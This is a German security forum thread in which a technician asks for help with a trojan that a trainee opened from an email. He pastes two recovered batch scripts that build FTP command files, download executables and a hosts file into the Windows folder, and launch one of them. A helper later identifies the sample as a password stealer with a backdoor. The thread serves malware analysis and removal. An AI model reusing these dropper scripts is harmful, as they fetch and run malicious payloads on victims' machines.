Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Selbstgebastelter Trojaner? Funktion unbekannt?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 12.03.2011, 15:02   #1
Markus09
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



Hallo Forum!

Ich drehe hier am Rad...

Bei einem Kunden hat ein Azubi irgendeinen Scheiss aus einer Email ausgeführt.

adobeupdater.exe

Durch paar Tricks mit der Sandbox habe ich herausgefunden:


1) es wird im temp verzeichniss eine bat angelegt mit foglendem inhalt:

"
o ftp.XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
weiswein007
bin
lcd C:\Windows
prompt
mget Windows.exe
mget hosts
bye
"

Desweiteren werden dann per FTP anscheinend 4 Files geholt.
eine Hosts datei, "port.exe" + "Sicherheitsupdate.exe" + "windows.exe"

und im c:\windows verzeichniss gespeichert!

Die Sicherheitsupdate.xe kreirt ebenfalls eine batt mit folgendem inhalt:

"@echo off
bjfeobefwbuoefwbuiofebuoebfwobuoefuhfuhefwu6895169516951695169051690516905160915609516060516051e
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651
hjbjkiioi896569569569569561512gjbjvbowvbowvbbjbuiewbuiecbuiebuiebfui698516951651695169516givGUIvgu
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651

> %0.ftp echo o XXXXXXXXXXXXXXXXXXXX
>> %0.ftp echo XXXXXXXXXXXXX
>> %0.ftp echo weiswein007
>> %0.ftp echo bin
>> %0.ftp echo lcd %WINDIR%
>> %0.ftp echo prompt
>> %0.ftp echo mget Sicherheitsupdate.exe
>> %0.ftp echo bye

ftp -s:%0.ftp

ping -n 60 localhost > nul & start %WINDIR%\Sicherheitsupdate.exe

exit"


Desweiteren werden einige andere files angelegt und FTP requests asgeführt welche ich nicht so schnell tracen konnte....



Hilft mir mal bitte. Was ist das hier für eine *******?!!

Ich muss die Kiste nachher platt machen... das werden 5-6 Stunden arbeit sein......


im anhang findet ihr 1x die ursprungs EXE sowie die 3-4 files welche die bat datei herunterlädt...


EDIT: ok die restliche files kann ich nicht im board anhngen da größer als 148kb...

Geändert von Markus09 (12.03.2011 um 15:35 Uhr)

Alt 12.03.2011, 15:17   #2
markusg
/// Malware-holic
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



hallo, mal ne frage, bist du irre die datei hier anzuhängen? soll sich da jeder mit infizieren können?
ich sehe sie mir an, versuch ob du noch löschen kannst und ich werd außerdem nem mod bescheid geben.
__________________

__________________

Alt 12.03.2011, 15:20   #3
markusg
/// Malware-holic
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



ich würd dich außerdem bitten die ftp daten zu entfernen
der trojaner ist schlecht gemacht, man kommt einfach an die daten. ich lösche erst mal das zeug was der auf dem ftp hat
__________________
__________________

Alt 12.03.2011, 15:20   #4
Markus09
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



Den Beitrag kann ich noch editieren, jedoch keine Dateianhänge bearbeiten.
Ich denke niemand wird so lebensmüde sein und nach dem Lesen des Beitrags den Anhang 4fun ausführen.

Falls ja dann klar: Vmware, Sandbox, etc.

Alt 12.03.2011, 15:21   #5
Markus09
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



FTP Daten gelöscht.

Was kannst Du mir zu dem Trojaner sagen, welche Funktion erfüllt er genau?

Komischerweise ist nichts angesprungen.
Kein Kaspersky, keine Programmkontrolle usw.

Welchen Zweck soll der Trojaner erfüllen?!


Alt 12.03.2011, 15:26   #6
markusg
/// Malware-holic
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



kann ich dir noch net sagen. das denkst du vllt das das keiner anklickt... ich sehe es mir kmal an und meld mich
__________________
--> Selbstgebastelter Trojaner? Funktion unbekannt?

Alt 12.03.2011, 15:26   #7
cad
/// caddy ☀
 

Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



Zitat:
Zitat von Markus09 Beitrag anzeigen
Den Beitrag kann ich noch editieren, jedoch keine Dateianhänge bearbeiten.
Doch, könntest Du noch

Kontrollzentrum - ganz links unten Anhänge - Rechts den Anhang markieren und unten auf löschen
Ich hab in diesen Unterforum keine Modrechte, sonst wäre der schon gelöscht
__________________
Investiere keine Zeit in Jemand oder eine Sache, für die/den du oder die für dich nur eine Option unter Vielen ist


Jede Hilfestellung erfolgt
ohne Gewähr und Haftung



Alt 12.03.2011, 15:36   #8
Markus09
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



Ok ist weg.

Dennoch.
Wie kann jemand ohne den Anhang den Inhalt analysieren?

Bitte schaut euch das an.
Die Kiste ist ziemlich dicht gemacht, dennoch verstehe ich nicht was der Trojaner hier macht und bereite schon über 600GB an Backups vor ....

Alt 12.03.2011, 15:42   #9
markusg
/// Malware-holic
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



ich hab die datei und wir hätten auch nen upload channel
http://www.trojaner-board.de/54791-a...ner-board.html
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 12.03.2011, 15:51   #10
Markus09
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



Zitat:
Zitat von markusg Beitrag anzeigen
ich hab die datei und wir hätten auch nen upload channel
http://www.trojaner-board.de/54791-a...ner-board.html


Cool

Das einzige was malware antibytes findet ist:

Infizierte Dateien:
c:\Windows\System32\secushr.dat (Malware.Trace) -> No action taken.
c:\Windows\SysWOW64\secushr.dat (Malware.Trace) -> No action taken.

Sonst keinerlei Meldungen, nicht von kaspersky oder sonstwas...

Alt 12.03.2011, 15:57   #11
markusg
/// Malware-holic
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



kannst mal in deine privaten nachichten schauen?
mir ist da ein missgeschick passiert und ich bnötige die dateien aus deiner sandbox, falls sie noch bestehen.
vom server habe ich sie ja gelöscht, aber beim download gabs probleme.
sieht aber sehr nach backdoor aus.
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 13.03.2011, 11:16   #12
Markus09
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



Und, gibt es schon Neuigkeiten?

Alt 13.03.2011, 16:13   #13
markusg
/// Malware-holic
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?



sorry war bescheftigt gestern.
ja ist nen passwort stealer, mit backdoor funktionalität.
wenn das also nen firmen pc ist, sollte man den vllt neu machen.
würd ich persönlich jedenfalls so handhaben
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Antwort

Themen zu Selbstgebastelter Trojaner? Funktion unbekannt?
andere, anhang, arbeit, bat, board, datei, ebenfalls, email, files, folge, forum, funktion, gespeichert, inhalt, kis, kunde, localhost, scheiss, schnell, start, stunden, temp, tricks, trojaner, trojaner?, unbekannt



Ähnliche Themen: Selbstgebastelter Trojaner? Funktion unbekannt?


  1. GVU Trojaner, weißer Bildschrim Taskmanager und abgesicherter Modus ohne Funktion
    Log-Analyse und Auswertung - 01.07.2013 (7)
  2. MSC unbekannt
    Alles rund um Windows - 20.06.2013 (3)
  3. Datei Unbekannt
    Alles rund um Windows - 28.03.2013 (1)
  4. GVU TROJANER (abgesichert Modus ohne Funktion) OTLPE
    Plagegeister aller Art und deren Bekämpfung - 17.03.2013 (19)
  5. MSE hat Trojaner entdeckt, genaue Bezeichnung dank UTS leider unbekannt
    Log-Analyse und Auswertung - 22.01.2013 (3)
  6. Bundespolizei-Trojaner mit Webcam-Funktion
    Log-Analyse und Auswertung - 08.11.2012 (19)
  7. Sheriff-Funktion / Virtueller PC vs. Verschlüsselungs-Trojaner?
    Log-Analyse und Auswertung - 08.10.2012 (9)
  8. GVU Trojaner version unbekannt WIN XP
    Plagegeister aller Art und deren Bekämpfung - 21.09.2012 (6)
  9. Trojaner PUPVShare - Antivirenprogramme ohne Funktion
    Plagegeister aller Art und deren Bekämpfung - 13.08.2012 (7)
  10. Nach GVU-Trojaner nur noch eingeschränkte Funktion sowie Meldung "roper0dun.exe"
    Plagegeister aller Art und deren Bekämpfung - 18.07.2012 (11)
  11. Tan-Abfrage durch Unbekannt! Trojaner?
    Plagegeister aller Art und deren Bekämpfung - 02.05.2011 (1)
  12. Trojaner-Board Nachrichten-Funktion
    Diskussionsforum - 23.02.2010 (2)
  13. 2 Trojaner aufm pc Turkojan und unbekannt :(
    Log-Analyse und Auswertung - 10.08.2009 (53)
  14. Unbekannte Viren oder Trojaner pc langsam und keine funktion des Taskmanager´s
    Log-Analyse und Auswertung - 19.03.2008 (11)
  15. Trojaner drauf? Prozesse sind unbekannt
    Log-Analyse und Auswertung - 11.02.2007 (2)
  16. Hilfe Hab ein Trojaner der unbekannt ist!!
    Plagegeister aller Art und deren Bekämpfung - 31.03.2005 (1)
  17. Unbekannt und HARTNÄCKIG
    Log-Analyse und Auswertung - 02.10.2004 (1)

Zum Thema Selbstgebastelter Trojaner? Funktion unbekannt? - Hallo Forum! Ich drehe hier am Rad... Bei einem Kunden hat ein Azubi irgendeinen Scheiss aus einer Email ausgeführt. adobeupdater.exe Durch paar Tricks mit der Sandbox habe ich herausgefunden: 1) - Selbstgebastelter Trojaner? Funktion unbekannt?...
Archiv
Du betrachtest: Selbstgebastelter Trojaner? Funktion unbekannt? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.